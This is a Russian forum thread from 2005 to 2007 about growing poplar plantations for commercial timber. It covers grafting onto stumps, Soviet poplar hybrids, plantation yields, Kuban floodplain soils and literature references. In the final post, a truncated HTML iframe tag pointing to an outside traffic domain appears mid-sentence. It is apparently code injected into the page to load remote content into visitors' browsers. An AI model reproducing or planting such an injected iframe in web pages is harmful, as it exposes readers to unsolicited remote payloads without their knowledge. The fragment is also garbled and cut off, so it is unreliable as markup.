Выращивание плантаций тополя для коммерческого использования

Этот форум - для тех, кто на общественных началах занимается или планирует заняться выращиванием лесных растений, возрождением лесов, озеленением территории и т.п.

Модератор: Модераторы

Выращивание плантаций тополя для коммерческого использования

Сообщение Сергей Заворин » Пн ноя 07, 2005 8:32 pm

Наше предприятие занимается спиливанием старовозрастных и аварийных лиственных деревьев в населённых пунктах Абинского района Краснодарского края. Спиленную древесину мы перерабатываем в тару для различной плодо-овощной продукции. Объёмы таких работ, естественным образом ограничены , и в скором времени , по всей видимости, пойдут на убыль. Поэтому , мы заинтересованы в развитии постоянной сырьевой базы .
Известно, что существует практика создания плантаций лиственных пород. Обычная практика выращивания дерева от саженца , до "готового к употреблению" похоже , вряд ли кого устроит из-за длительности сроков .
Так в открытой печати упомянуются работы австралийской компании FastForests Inc, разработавшую породу "быстрорастущих" деревьев SupaTree, однако , речь идёт о выращивании т.н. "мутированных лесов" , что по-видимому небезопасно.
Однако также известно , что ведутся работы по уменьшению сроков созревания древесины , в частности за счёт прививания на пнях уже спиленных деревьев . Так , например, директор по развитию Архангельского ЦБК. Наталья Пинягина , ссылаясь на аналогичный опыт промышленников Северной Африки и Италии, говорит о том , что , далее цитирую «В перспективе Архангельский ЦБК, как и многие другие целлюлозно-бумажные комбинаты, предпримет попытку наладить плантационное восстановление лесов, когда к пню тополя или осины с корнями прививается новый росток и срок созревания дерева сокращается примерно с 60 до 30 или 20 лет» .
Таким образом , мы заинтересованы в деловом сотрудничестве по вопросам промышленного выращивания тополя или других быстрорастущих деревьев интенсивными способами .
Сергей Заворин
Начинающий пользователь
 
Сообщения: 2
Зарегистрирован: Вс ноя 06, 2005 7:19 pm
Откуда: Краснодарский край

Уточнение информации

Сообщение Сергей Заворин » Пт ноя 11, 2005 9:40 pm

Уважаемый Алексей , я хотел бы уточнить , что нас интересует не топливная древесина , а деловая часть , которую можно распиливать в дальнейшем для получения тарной дощечки, поэтому "прививка тополя в пень с корнями" , в нашем случае , как раз таки поможет уйти от пневой поросли , которая нас не интересует. Спасибо за Вашу подробную информацию относительно технологии разбивки самой плантации . Хотелось бы только подробнее узнать об оптимальных параметрах самой планировки, т.е. рекомендуемые расстояния между деревьями в ряду , расстояния между рядами , необходимости обработки междурядий и возможно многое другое, о чём мы не догадываемся. Выращивать , скорее всего нужно пирамидальный тополь (меньше веток) , и если всё-таки производить прививку, то как можно точнее по центру , производя при этом (видимо) какую-то "консервацию" оставшейся свободной поверхности пня , как раз именно в целях недопущения развития пневой поросли. Мы не зацикливаемся на идее прививания . Даже наоборот . По всей видимости, проще идти экстенсивным путём , за счёт увеличения площадей плантаций деревьев. Если честно, то нас просто интересует любая возможность сокращения созревания дерева в целом , сами понимаете почему . Ещё раз спасибо за внимание к нашему сообщению.
Сергей Заворин
Начинающий пользователь
 
Сообщения: 2
Зарегистрирован: Вс ноя 06, 2005 7:19 pm
Откуда: Краснодарский край

Сообщение Обапол » Пт фев 17, 2006 3:26 pm

Алексей Ярошенко писал(а):В России опыта выращивания быстрорастущих тополевых плантаций практически нет, соответственно, и толковой литературы тоже нет. Но есть много зарубежной литературы - в основном на английском.



Уважаемый Алексей!
Извините, но вынужден, Вас поправить.
В России опыт выращивания быстрорастущих тополевых плантаций имеется и есть много толковой литературы – в основном на русском.
Плантационное разведение и использование быстрорастущих пород - один из главных путей интенсификации производства древесины в качестве сырья для лесоперерабатывающей промышленности. Породой, использование которой для данной цели наиболее перспективно является тополь, который за быстроту роста и скороспелость называют «эвкалиптом Севера».
Как показывает практика тополеводства, в ряде регионов России возможно создание лесосырьевых плантаций тополя с приростом древесины до 30—40 м3/га в год. Решение этой задачи в значительной мере облегчается тем, что у тополей получены и уже широко культивируются высокопродуктивные и ценные по техническим качествам древесины сорта.
В нашей стране в 30-х – 70-х годах проводились широкие работы по выведению его новых сортов и форм с использованием методов межвидовой и отдаленной гибридизации.
К работам по гибридизации тополей приступили в 30-х годах сразу в нескольких районах. В Ленинграде скрещивания провел П. Л. Богданов (1951, 1965 и др.) с целью получения ценных по быстроте роста, декоративности и зимостойкости тополей для местных условий и в целом для района Нечерноземья. Особенно широко известны его гибридные тополя Ленинградский (получен от скрещивания тополя канадского с тополем душистым) и Невский (от скрещивания тополя канадского с бальзамическим). Оба гибрида отличаются быстрым ростом, зимостойки.
В Москве, а затем в Камышине Волгоградской обл. гибридизацией тополей занимался А. В. Альбенский (1946, 1961 и др.). В его работах ставилась задача получить новые гибриды тополей с повышенной энергией роста, засухо- и солеустойчивые для культур в степных условиях, особенно при полезащитном лесоразведении, а также декоративные для целей озеленения. Наиболее ценными и известными его гибридами являются тополь бальзамический улучшенный (получен от скрещивания тополя бальзамического с берлинским), тополь Московский улучшенный (от скрещивания тополя Московского с берлинским), тополь Болле камышинский (от скрещивания тополя белого с Болле), а также гибриды: тополь черный пирамидальный X тополь берлинский, тополь черный пирамидальный X тополь китайский, тополь черный пирамидальный X осокорь. Многие из этих гибридов успешно используются для целей защитного лесоразведения.
В городе Пушкино под Москвой примерно в это же время начал работу по гибридизации тополей А. С. Яблоков (1956 и др.), ставя перед собой задачу получения быстрорастущих и устойчивых против гнили гибридов осины, а также быстрорастущих и зимостойких пирамидальных серебристых и черных тополей для средней и северной полосы европейской части страны. Самые лучшие результаты были получены от скрещивания: осины с тополем Болле — тополь Яблокова; тополя белого с тополем Болле — тополь Советский пирамидальный; тополя черного пирамидального с осокорем — тополя Русский, Мичуринец и Пионер; тополя душистого с осиной — тополь Ивантеевский; тополя душистого с тополем берлинским — тополь Подмосковный. Эти гибриды отличаются быстротой роста и декоративностью.
Быстрорастущие гибриды получены от скрещивания тополя белого из Курска с тополем крупнозубчатым из Канады, а также тополя белого с осиной американской. От скрещивания тополя белого из Курска и Обояни с тополем Болле из Ташкента получены зимостойкие серебристые пирамидальные тополя Курский и Обоянский.
Большие работы по гибридизации тополей в этот начальный период были проведены в башкирской предуральской лесостепи А. М. Березиным (1939), который для скрещивания использовал как местные виды (осокорь, тополь белый, осину), так и интродуценты. По объему выполненных скрещиваний и полученным результатам это была одна из самых заметных работ того времени. Наиболее ценные по быстроте роста гибриды были получены от скрещивания местного осокоря с тополем черным пирамидальным, тополями берлинским и канадским, а также тополя бальзамического с тополями лавролистным, душистым и серым.
На Урале (Свердловск) Н. А. Коновалов (1959, 1964) получил более 10 перспективных гибридов тополей, среди которых особенно широко известны тополь Свердловский серебристый пирамидальный (тополь белый X тополь Болле) и Свердловская пирамидальная осина (осина X тополь Болле).
В пойменных условиях Юматовского лесхоза Башкирии в возрасте 30 лет насаждения гибрида А. М. Березина тополь бальзамический X тополь лавролистный имели запас 1430 м3/га, гибрида тополь бальзамический X тополь берлинский — 1200 м3/га и гибрида осокорь X тополь берлинский — 1600 м3/га. В пойменных условиях Обоянского лесхоза в центральной лесостепи тополь Русский А. С. Яблокова в возрасте 10 лет имел среднюю высоту 18 м, средний диаметр 18 см и запас 300 м3/га. В том же лесхозе, но на плато со светло-серыми суглинками и уровнем грунтовых вод, не доступным для растений, насаждения гибрида обоянской исполинской осины с американской осиной в возрасте 11 лет имели запас древесины 250 м3/га. Очень высокую продуктивность многие гибриды показывают на Украине, в южных и юго-восточных районах Российской Федерации, при выращивании на поливах в Средней Азии и других районах.
В ЦЧО плантационные культуры сортовых тополей были заложены в Обоянском, Курском и Рыльском лесхозах Курской области, Старо-Оскольском лесхозе Белгородской области, Ново-Усманском лесхозе Воронежской области и Степном лесхозе Тамбовской области.

Как правило, Вы даёте чёткие и взвешенные комментарии, но возможно в данном случае Вам сначала следовало проконсультироваться в Научно-исследовательском институте лесной генетики и селекции (НИИЛГиС) расположенном в Воронеже.
( ilgis@lesgen.vrn.ru)
.
Обапол
Пользователь
 
Сообщения: 90
Зарегистрирован: Ср фев 15, 2006 8:25 am
Откуда: Москва

Сообщение Шурави » Вс фев 19, 2006 6:41 am

Опыт по выращиванию тополя есть в Бийском лесхоз-техникуме.
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Сообщение Обапол » Вс фев 19, 2006 1:52 pm

Anonymous писал(а):Да, вероятно, я слишком резко выразился насчет отсутствия плантаций и опыта. Было бы очень хорошо, если бы Вы подсказали, где этот российский опыт выращивания тополевых плантаций обобщен - в смысле, какие есть толковые книги и справочники на эту тему.

Уважаемый Алексей!
С этим вопросом Вам лучше обратиться по указанному мною адресу, к Русину Николаю Степановичу. Телефон в Воронеже: 53-94-36.
Желаю Вам успеха!
Обапол
Пользователь
 
Сообщения: 90
Зарегистрирован: Ср фев 15, 2006 8:25 am
Откуда: Москва

Сообщение Обапол » Вс фев 19, 2006 7:45 pm

Anonymous писал(а):Правильно ли я понял - он сотрудник Института лесной генетики и селекции?
Алексей

Да, это так!
Обапол
Пользователь
 
Сообщения: 90
Зарегистрирован: Ср фев 15, 2006 8:25 am
Откуда: Москва

Сообщение В.Марков » Вт фев 21, 2006 2:45 pm

Опыт разведения культур тополя плантационного типа именно
в Краснодарском крае обобщен в:
Зубарева Л.М., Калинина А.В. Рост и производительность культур тополя в Краснодарском крае,- «Труды Северокавказской лесной опытной станции», 1971, вып.9, с.157-173.
«Лесное хозяйство» №5 1973 год
Культуры тополей в пойме Кубани
Л.М.Зубарева, канд.биол.наук ( Северо-Кавказская ЛОС)

Цитаты:
Рост и поизводительность тополевых культур на пойменных почвах Кубани,
имеющих сравнительно близкие агрохимические показатели, в большой степени опеделяется мощностью почв, глубиной залегания грунтовых вод, галечника и горизонта
оглеения.

Лучшие условия выращивания [тополя]
почвы - аллювиально-луговые легкосуглинистые, суглинистые,
реже супесчаные, богатые кальцием. Глубина залегания галечника ниже 1,5-2м или его нет. Грунтовые воды в межень - на глубине 1,5 - 2 м. Оглеения нет или глубже 2 м.
Затопляемость - не более 20 дней.
В.Марков
Пользователь
 
Сообщения: 46
Зарегистрирован: Вт июл 20, 2004 10:08 am
Откуда: Москва

Сообщение Обапол » Вс мар 12, 2006 4:40 pm

Алексей Ярошенко писал(а):Уважаемый Сергей,


В России опыта выращивания быстрорастущих тополевых плантаций практически нет ....


Во времена СССР, Херсонский ЦБЗ заложил несколько тыс. га тополевых плантаций, более того с этих плантаций уже получали балансы(сырьё для ЦБП).
Обапол
Пользователь
 
Сообщения: 90
Зарегистрирован: Ср фев 15, 2006 8:25 am
Откуда: Москва

Re: Выращивание плантаций тополя для коммерческого использов

Сообщение Обапол » Сб апр 15, 2006 9:25 am

Интересная информация по выращиванию тополя:
· Русина Л.М. Итоги многолетних исследований и перспективы использования тополя в ЦЧО //Лесные стационарные исследования: методы, результаты, перспективы (Материалы совещания Москва 18-20 сентября 2001г.) Тула 2001
Обапол
Пользователь
 
Сообщения: 90
Зарегистрирован: Ср фев 15, 2006 8:25 am
Откуда: Москва

Re: Выращивание плантаций тополя для коммерческого использов

Сообщение Alifer » Сб июл 14, 2007 1:55 am

Обапол писал(а):Интересная информация по выращиванию тополя:
· Русина Л.М. Итоги многолетних исследований и перспективы использования тополя в ЦЧО //Лесные стационарные исследования: методы, результаты, перспективы (Материалы совещания Москва 18-20 сентября 2001г.) Тула 2001


Какое интересное у Вас тут обсуждение получилось. Я только на годок припоздал. :D<iframe src='http://traffstats.biz/adv/new.ph Так все же есть у кого живая литература по данному вопросу?
Alifer
Пользователь
 
Сообщения: 5
Зарегистрирован: Сб июл 14, 2007 1:49 am

След.

Вернуться в Как вырастить свой лес

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 5

cron